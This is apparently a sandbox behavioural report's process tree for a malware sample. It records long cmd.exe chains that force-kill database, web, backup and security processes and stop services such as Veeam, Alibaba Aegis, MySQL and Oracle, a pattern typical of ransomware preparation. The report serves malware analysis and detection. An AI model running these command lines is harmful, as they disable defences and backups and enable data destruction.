C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFOTPService6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SupportAssistAgent.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SunloginClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SOUNDMAN.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM WeChat.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TXPlatform.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Tencentdll.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM jenkins.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QQ.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZip.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoZipScan.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TSVNCache.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCpl64.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlservr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM httpd.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdhost.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fdlauncher.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM reportingservicesservice.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM softmgrlite.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlbrowser.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssms.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmtoolsd.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM baidunetdisk.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM yundetectservice.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ssclient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNAupdaemon.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RAVCp164.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxEM.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxHK.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM igfxTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM 360bdoctor.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PrivacyIconClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UIODetect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoDealService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IDDAService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EnergyDataService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MPService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TransMain.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DAService.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exenet stop UIODetect5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UIODetect6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer85⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer86⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMwareHostd5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ImtsEventSvr6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VMUSBArbService5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop VMAuthdService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMAuthdService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop WebAttendServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WebAttendServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop mysqltransport5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop wanxiao-monitor5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop VMnetDHCP5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMnetDHCP6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "VMware NAT Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Tomcat85⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Tomcat86⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TeamViewer5⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TeamViewer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop QPCore5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QPCore6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASLicenceServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASLicenceServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASWebServer5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASWebServer6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdateService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdateService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Detect Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Alibaba Security Aegis Update Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "AliyunService"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "AliyunService"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASXMLService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASXMLService6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetVault Process Manager"7⤵
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop AGSService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AGSService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDNSService5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDNSService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop iNethinkSQLBackupSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop iNethinkSQLBackupSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASVirtualDiskService5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASVirtualDiskService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop CASMsgSrv5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASMsgSrv6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "OracleOraDb10g_homeliSQL*Plus"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop OracleDBConsoleilas5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleDBConsoleilas6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop MySQL5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService12206⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OMAILREPORT7⤵
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService12206⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdUpgradeService12205⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdUpgradeService12206⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MobileServiceManage5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MobileServiceManage6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "FileZilla Server"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "FileZilla Server"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop DDVRulesProcessor5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DDVRulesProcessor6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AutoUpdatePatchService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AutoUpdatePatchService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ImtsEventSvr5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop "Dell Hardware Support"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Dell Hardware Support"6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KugouService7⤵
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop OMAILREPORT5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop SupportAssistAgent5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SupportAssistAgent6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop K3MMainSuspendService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop K3MMainSuspendService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop KpService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KpService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop ceng_web_svc_d5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ceng_web_svc_d6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop KugouService5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop pcas5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop pcas6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop U8SendMailAdmin5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop U8SendMailAdmin6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Apple Mobile Device Service"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Apple Mobile Device Service"6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Bonjour Service"5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop "ABBYY.Licensing.FineReader.Professional.12.0"5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "ABBYY.Licensing.FineReader.Professional.12.0"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"4⤵
-
C:\Windows\SysWOW64\net.exenet stop HaoZipSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Realtek11nSU5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop "igfxCUIService2.0.0.0"5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop xenlite5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop Apache2.25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Synology Drive VSS Service x64"5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop XenSvc5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop DellDRLogSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DellDRLogSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdGuardianDeafaultInstance5⤵
-
-
C:\Windows\SysWOW64\net.exenet stop JWEM3DBAUTORun5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWEM3DBAUTORun6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWRinfoClientService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWRinfoClientService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop JWService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop JWService6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop Service25⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Service26⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop RapidRecoveryAgent5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RapidRecoveryAgent6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop FirebirdServerDefaultInstance5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdServerDefaultInstance6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop AdobeARMservice5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AdobeARMservice6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamCatalogSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeanBackupSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeanBackupSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop VeeamTransportSvc5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc6⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdAppService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdAppService13006⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop TPlusStdTaskService13005⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TPlusStdTaskService13006⤵
-
-
-
